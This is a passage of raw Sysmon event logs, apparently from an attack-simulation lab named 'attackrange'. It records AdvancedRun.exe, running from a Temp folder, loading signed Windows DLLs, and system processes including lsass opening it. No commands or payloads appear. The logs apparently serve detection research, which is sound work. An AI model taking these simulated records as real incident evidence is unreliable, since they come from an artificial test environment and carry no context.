18:44:38.957{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004011421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.817{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.817{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® 
C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.738{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011404Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011403Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011401Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011400Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011399Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011398Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011397Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011396Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011395Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.723{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
